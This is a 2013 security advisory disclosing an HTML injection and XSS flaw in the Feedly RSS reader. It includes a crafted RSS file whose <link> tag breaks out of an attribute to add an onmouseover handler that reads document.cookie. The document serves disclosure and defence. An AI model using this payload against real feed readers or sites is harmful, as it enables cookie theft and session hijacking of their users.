* Feedly.com HTML Injection and XSS Vulnerability RSS feed
* ========================================================
*
* Site: http://feedly.com
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================


Report-Timeline:
----------------
2013-07-02: Reported to domain's tech contact



Introduction:
-------------
Feedly.com is an RSS feed reader, once you sign up (local account 
or google auth) you can add, also by typing URL, RSS Feeds from your 
preferred web sites.



Description:
------------
I found this XSS Vulnerability and HTML Injection by adding a fake RSS, with a 
JavaScript "injection" inside the tag <link>.  I've see that Feedly.com 
doesen't escape/sanitize the "quotes" inside this tag...
so, i've put something like this:

<link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link>



Full RSS "Exploit" with injection on tag <link>:
------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
<item>
<title>Test XSS Vulnerability</title>
<link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link>
<pubDate>Sun, 2 Jul 2013 22:56:41 GMT</pubDate>
<description>XSS TEST, yuk!</description>
</item>
</channel>
</rss>



Screenshot XSS Vulnerability:
-----------------------------
http://goo.gl/fs2Vg



CREDITS:
---------
This vulnerabilities has been discovered
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)



LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.